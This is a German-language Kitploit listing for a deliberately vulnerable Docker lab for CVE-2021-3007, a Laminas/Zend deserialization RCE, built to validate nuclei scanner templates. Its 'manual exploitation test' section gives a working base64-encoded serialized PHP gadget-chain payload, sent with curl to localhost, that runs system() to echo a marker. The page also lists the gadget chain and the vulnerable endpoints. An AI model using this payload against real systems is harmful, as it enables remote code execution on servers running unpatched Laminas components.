Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-3007-vulnerable — CVE-2021-3007 Verwundbare Testumgebung - Laminas/Zend Framework Deserialisierungs-RCE | Kitploit
Tools/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 Verwundbare Testumgebung - Laminas/Zend Framework Deserialisierungs-RCE

Repository anzeigen
vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3007 Angreifbare Testumgebung

Docker CVE CVSS

Absichtlich verwundbare Testumgebung zur Validierung der Erkennung von CVE-2021-3007 in Sicherheitsscannern.

Schwachstellenübersicht

AttributWert
CVE IDCVE-2021-3007
SchweregradKritisch (CVSS 9.8)
TypUnsicheres Deserialisieren → RCE
BetroffenLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Deserialisierung nicht vertrauenswürdiger Daten)

Schnellstart

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Einzeiler

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Manueller Exploitation-Test

root@kitploit:~
# Sende serialisiertes Payload, das RCE auslöst
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Erwartet: Antwort enthält "nucleiCVE20213007", was RCE bestätigt

Technische Details

Gadget-Kette

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Verwundbare Komponenten

PaketVersionZweck
laminas/laminas-http2.14.1Verwundbare HTTP-Komponente
laminas/laminas-view2.12.0Gadget-Ketten-Komponente
laminas/laminas-config3.7.0Gadget-Ketten-Komponente

Verwundbare Endpunkte

Die Anwendung akzeptiert serialisierte Daten per POST:

  • Pfad: / oder /index.php
  • Parameter: data, payload, serialized
  • Kodierung: Base64

Umgebungsdetails

KomponenteWert
Basis-Imagephp:8.1-apache
Port8080
Containercve-2021-3007-vulnerable

Dateien

root@kitploit:~
.
├── Dockerfile          # Container-Build-Konfiguration
├── docker-compose.yml  # Orchestrierung (Einrichtungsbefehl)
├── index.php           # Angreifbare PHP-Anwendung
├── LICENSE             # MIT-Lizenz
└── README.md           # Diese Datei

Sicherheitshinweis

WARNUNG: Diese Umgebung ist absichtlich verwundbar, nur für Sicherheitstests.

NICHT:

  • Öffentlichen Netzwerken aussetzen
  • In Produktionsumgebungen bereitstellen
  • Unbeaufsichtigt laufen lassen
  • Für böswillige Zwecke verwenden

TUN:

  • In isolierten Testumgebungen verwenden
  • Container stoppen, wenn nicht in Gebrauch
  • Nur für legitime Sicherheitsforschung verwenden

Referenzen

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas Security Release
  • CheckPoint Research - FreakOut
  • Ambionics Research

Lizenz

MIT-Lizenz - Nur für Sicherheitsforschung und Bildungszwecke.


Erstellt zur Validierung von nuclei-Vorlagen | projectdiscovery/nuclei-templates

Tool herunterladen